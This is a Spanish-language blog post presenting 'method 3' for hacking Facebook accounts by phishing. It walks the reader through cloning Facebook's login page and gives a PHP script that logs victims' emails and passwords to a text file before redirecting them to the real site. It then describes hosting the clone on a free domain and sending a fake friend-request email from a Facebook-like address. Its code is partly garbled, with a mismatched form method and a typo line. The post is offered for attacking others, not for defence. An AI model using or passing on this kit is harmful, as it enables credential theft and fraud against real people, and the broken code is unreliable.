METODO 3: HACKEAR CUENTA FACEBOOK USANDO PHISHING

By | 3 Octubre 2017

Tal vez has escuchado la palabra Phishing en los medios o la has leído en los mails de advertencia de seguridad que envían las entidades bancarias o tarjetas de crédito. Es un excelente método para hackear cuenta Facebook, así como para obtener todas las contraseñas de un usuario. El Phishing es utilizado para referirse a uno de los métodos más utilizados por delincuentes cibernéticos para estafar y obtener información confidencial de forma fraudulenta como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria de la víctima.

La palabra Phishing viene del inglés fishing (pescando) aludiendo al intento de que los usuarios “muerdan el anzuelo”. Se comenzó a utilizar en 1995 por hackers que deseaban obtener las contraseñas del servicio AOL. Con gran éxito se sigue usando desde entonces.

CÓMO FUNCIONA EL PHISHING PARA HACKEAR CUENTA FACEBOOK

El estafador, conocido como Phisher, se hace pasar por una persona o empresa de confianza. En este caso por una página de Facebook, en una aparente comunicación oficial electrónica. Por lo general un correo electrónico, o algún sistema de mensajería instantánea, redes sociales SMS/MMS, a raíz de un malware o incluso utilizando también llamadas telefónicas.

Su funcionamiento es sencillo. El hacker envía a su víctima un mail de aviso de que se ha recibido un depósito (en caso de bancos) o que es necesario cambiar la contraseña porque se ha vencido (en caso de redes sociales) de aspecto igual a los mails de la empresa oficial. El mail muestra un botón. Al hacer click en él lleva a una página idéntica a la del Banco o a la de Facebook. Allí el usuario se ve obligado a poner su mail, nombre de usuario y contraseña. Como es una página falsa, guarda estos datos y se los envía al hacker.

Es así de sencillo. El truco está en hacer creer a la víctima que ese mail y pagina destino son las originales.

hackear cuenta facebook phishing

En el caso de los delincuentes, éstos envían mails masivos a muchas probables víctimas y obtienen las contraseñas de quienes “muerden el anzuelo”, siguiendo estos pasos en general:

hackear cuenta facebook phishing

En este artículo veremos entonces cómo crear una página idéntica a la oficial de Facebook.

HACKEAR CUENTA FACEBOOK CREANDO UN CLON DE LA PAGINA PARA PHISHING

    • En el navegador que utilizas habitualmente, entrar a https://www.facebook.com/, hacer click con el botón derecho del mouse y seleccionar “ver código fuente de la página

hackear cuenta facebook

    • Se abrirá otra ventana con mucho texto, seleccionamos y copiamos todo. Abrir el block de notas y pegar todo esto ahí.

hackear cuenta facebook

    • Con la opción “buscar” o con CTRL + F buscar la cadena la cadena “action=” dentro del extenso código:

hackear cuenta facebook

  • Como se observa en la imagen, la cadena “action=” apunta a una web donde se solicita que el usuario entre sus datos para el login. Hay que modificar esto reemplazando todo el texto que se muestra en el rectángulo rojo de la imagen anterior, por “next.php”.
  • Después de la función “action” se indica el método, en la imagen encerrado en un óvalo rojo como “method=post”. Hay que reemplazar la palabra “post” por “mail”. Quedará como se muestra en la imagen siguiente:

hackear cuenta facebook

    • Ahora guardar este documento de bloc de notas como “index.html”
    • A continuación, hay que crear el script mencionado llamado “next.php”. Abrir un nuevo documento en el bloc de notas y pegar allí este código:

      COPIA Y PEGA ESTE CODIGO

      – <?php

      – header(“Location: http://www.Facebook.com/login.php “);

      – $handle = fopen(“yaeresmio.txt”, “a”);

      – foreach($_GET as $variable => $value) {

      – fwrite($handle, $variable);

      – fwrite($handle, “=”);

      – fwrite($handle, $value);

      – fwrite($handle, “\r\n”);

      – }

      – frité($ande, “\r\n”);

      – fclose($handle);

      – exit

    • Guardar el archivo llamándolo “next.php”
    • El siguiente paso es abrir otro documento nuevo del bloc de notas, llamarlo “yaeresmio.txt” y guardarlo en blanco, sin ningún texto excrito.
    • Por otro lado, es necesario que tengamos algún dominio o subdominio y hosting. Si tienes uno de pago, mejor, ellos cuentan con servicio de redirección que ocultará tu ir. Sino, utiliza uno gratuito como este ya que es improbable que el usuario a quien deseas hackear cuenta Facebook sepa requerir ese dato.
    • En el hosting elegido si es nuevo, hay que registrarse y elegir un dominio sino se tiene uno. En caso de ya poseer dominio y hosting, elegir un subdominio como se ve en la imagen de un hosting de ejemplo:

hackear cuenta facebook

    • Verificar que el servicio gratuito tenga servicios de función php para que se ejecute el script que creamos. Luego, ir a la sección FTP para subir nuestros archivos. Ejemplo:

hackear cuenta facebook

    • En la siguiente imagen ya se han subido los 3 archivos creados al hosting gratuito:

hackear cuenta facebook

    • En el ejemplo el dominio elegido es falsofbweb.esv.es. Probar si el dominio que se ha elegido funciona entrando en él. Puede ocurrir que haya que corregir algunos detalles. Por ejemplo  los acentos en el archivo de texto next.php, como se muestra en la imagen:

CHEQUEAR FUNCIONAMIENTO

    • Probar si funciona intentando logguearse con el Facebook propio. Lo que pasará es que se nos redirigirá a una página oficial de Facebook donde se nos dice que hemos escrito mal la contraseña:

hackear cuenta facebook

    • Si ahora nos dirigimos a nuestro hosting y abrimos el archivo “yaeresmio.txt”, vemos que ahí ha quedado guardada la dirección de mail y contraseña que acabamos de escribir. Eso es lo que pasará cuando la víctima haga lo mismo en la página clon que acabamos de crear.

hackear cuenta facebook

    • Por lo tanto, la página está lista para funcionar. Ahora hay que lograr que la víctima entre en ella.

      CREAR EL MAIL PHISHING PARA HACKEAR CUENTA FACEBOOK:

    • A continuación, hay que hacer lo más sencillo. Esto es crear el mail para lograr hackear cuenta Facebook .Hay que crear una cuenta de mail que contenga la palabra Facebook, por ejemplo SolicitudesFacebook@hotmail.com o algo así. Creamos un mail dirigido a la víctima donde copiamos y pegamos la imagen de una solicitud de amistad real de Facebook.  Tienen un aspecto como este:

hackear cuenta facebook

  • En la imagen ponemos el link de la página clon creada, en el ejemplo es falsofbweb.esv.es.
  •  Enviar el mail a la víctima.
  • Sólo falta esperar a que se loguee y aparezca su mail y contraseña en el archivo “yaeresmio.txt”.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *